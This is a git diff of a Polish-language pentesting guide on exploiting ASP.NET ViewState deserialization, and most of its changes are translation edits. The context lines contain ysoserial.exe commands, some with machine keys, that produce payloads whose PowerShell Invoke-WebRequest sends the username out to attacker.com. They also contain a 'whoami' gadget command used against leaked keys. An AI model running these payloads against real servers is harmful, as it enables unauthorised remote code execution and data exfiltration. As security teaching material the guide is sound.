diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md index b3b060c26..16221c366 100644 --- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md +++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md @@ -6,7 +6,7 @@ ## Czym jest ViewState -**ViewState** służy jako domyślny mechanizm w ASP.NET do utrzymywania danych strony i kontrolki pomiędzy stronami internetowymi. Podczas renderowania HTML strony, bieżący stan strony oraz wartości, które mają być zachowane podczas postbacku, są serializowane do ciągów zakodowanych w base64. Te ciągi są następnie umieszczane w ukrytych polach ViewState. +**ViewState** służy jako domyślny mechanizm w ASP.NET do utrzymywania danych strony i kontrolki pomiędzy stronami internetowymi. Podczas renderowania HTML strony, bieżący stan strony oraz wartości do zachowania podczas postbacku są serializowane do ciągów zakodowanych w base64. Te ciągi są następnie umieszczane w ukrytych polach ViewState. Informacje o ViewState można scharakteryzować następującymi właściwościami lub ich kombinacjami: @@ -38,10 +38,10 @@ Możesz spróbować zidentyfikować, czy ViewState jest chroniony przez MAC, prz ``` ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" ``` -### Test case 1.5 – Jak Test case 1, ale ciasteczko ViewState nie jest wysyłane przez serwer +### Test case 1.5 – Jak Test case 1, ale cookie ViewState nie jest wysyłane przez serwer -Programiści mogą **usunąć ViewState** z żądania HTTP (użytkownik nie otrzyma tego ciasteczka).\ -Można założyć, że jeśli **ViewState** jest **nieobecny**, ich implementacja jest **bezpieczna** przed potencjalnymi lukami związanymi z deserializacją ViewState.\ +Programiści mogą **usunąć ViewState** z stania się częścią żądania HTTP (użytkownik nie otrzyma tego cookie).\ +Można założyć, że jeśli **ViewState** jest **nieobecny**, ich implementacja jest **bezpieczna** przed wszelkimi potencjalnymi lukami związanymi z deserializacją ViewState.\ Jednak nie jest to prawda. Jeśli **dodamy parametr ViewState** do ciała żądania i wyślemy nasz zserializowany ładunek stworzony za pomocą ysoserial, nadal będziemy w stanie osiągnąć **wykonanie kodu**, jak pokazano w **Przypadku 1**. ### Test Case: 2 – .Net < 4.5 i EnableViewStateMac=true & ViewStateEncryptionMode=false @@ -124,7 +124,7 @@ Możemy wymusić użycie frameworka ASP.NET, określając poniższy parametr w p ```xml ``` -Alternatywnie, można to zrobić, określając poniższą opcję wewnątrz parametru `machineKey` w pliku web.config. +Alternatywnie, można to zrobić, określając poniższą opcję wewnątrz parametru `machineKey` pliku web.config. ```bash compatibilityMode="Framework45" ``` @@ -151,16 +151,16 @@ Gdy zostanie zidentyfikowany ważny klucz maszyny, **następnym krokiem jest wyg ``` ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2" --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" ``` -Jeśli masz wartość `__VIEWSTATEGENERATOR`, możesz spróbować **użyć** parametru `--generator` z tą wartością i **pominąć** parametry `--path` oraz `--apppath`. +Jeśli masz wartość `__VIEWSTATEGENERATOR`, możesz spróbować **użyć** parametru `--generator` z tą wartością i **pominąć** parametry `--path` i `--apppath`. ![](https://notsosecure.com/sites/all/assets/group/nss_uploads/2019/06/4.2.png) Udane wykorzystanie podatności na deserializację ViewState doprowadzi do żądania out-of-band do serwera kontrolowanego przez atakującego, które zawiera nazwę użytkownika. Tego rodzaju exploit jest demonstrowany w dowodzie koncepcji (PoC), który można znaleźć w zasobie zatytułowanym "Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET". Aby uzyskać dalsze szczegóły na temat tego, jak działa proces eksploatacji i jak wykorzystać narzędzia takie jak Blacklist3r do identyfikacji MachineKey, możesz zapoznać się z dostarczonym [PoC of Successful Exploitation](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC). -### Test Case 6 – Używany jest ViewStateUserKeys +### Test Case 6 – Używana jest ViewStateUserKeys Właściwość **ViewStateUserKey** może być używana do **obrony** przed **atakami CSRF**. Jeśli taki klucz został zdefiniowany w aplikacji i próbujemy wygenerować ładunek **ViewState** za pomocą metod omówionych do tej pory, **ładunek nie zostanie przetworzony przez aplikację**.\ -Musisz użyć jeszcze jednego parametru, aby poprawnie stworzyć ładunek: +Musisz użyć jeszcze jednego parametru, aby poprawnie utworzyć ładunek: ```bash --viewstateuserkey="randomstringdefinedintheserver" ``` @@ -204,19 +204,17 @@ Ten **prymityw eksfiltracji kluczy** był masowo wykorzystywany przeciwko lokaln ## Scenariusze rzeczywistego wykorzystania w latach 2024-2025 i twardo zakodowane klucze maszyn ### Fala "publicznie ujawnionych kluczy maszyn" Microsoftu (grudzień 2024 – luty 2025) -Microsoft Threat Intelligence zgłosił masowe wykorzystanie witryn ASP.NET, w których *machineKey* wcześniej wyciekł w publicznych źródłach (GitHub gists, posty na blogach, strony paste). Przeciwnicy enumerowali te klucze i generowali ważne gadżety `__VIEWSTATE` z nowymi flagami `ysoserial.net` 1.41 `--minify` i `--islegacy`, aby ominąć limity długości WAF: +Microsoft Threat Intelligence zgłosił masowe wykorzystanie witryn ASP.NET, gdzie *machineKey* wcześniej został ujawniony w publicznych źródłach (GitHub gists, posty na blogach, strony paste). Przeciwnicy enumerowali te klucze i generowali ważne gadżety `__VIEWSTATE` z nowymi flagami `ysoserial.net` 1.41 `--minify` i `--islegacy`, aby ominąć limity długości WAF: ```bash ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "whoami" \ --validationkey= --validationalg=SHA1 \ --decryptionkey= --decryptionalg=AES \ --generator= --minify ``` -Rotacja statycznych kluczy lub przejście na klucze *AutoGenerate* w Web .config (``) łagodzi tę klasę ataków. {{#ref}} - -{{#endref}} +Rotacja statycznych kluczy lub przejście na klucze *AutoGenerate* w Web .config (``) łagodzi tę klasę ataków. ### CVE-2025-30406 – Gladinet CentreStack / Triofox twardo zakodowane klucze -Kudelski Security odkrył, że wiele wydań CentreStack / Triofox dostarczono z identycznymi wartościami `machineKey`, co umożliwia nieautoryzowane zdalne wykonanie kodu poprzez fałszowanie ViewState (CVE-2025-30406). +Kudelski Security odkryło, że wiele wydań CentreStack / Triofox dostarczono z identycznymi wartościami `machineKey`, co umożliwia nieautoryzowane zdalne wykonanie kodu poprzez fałszowanie ViewState (CVE-2025-30406). Jednolinijkowy exploit: ```bash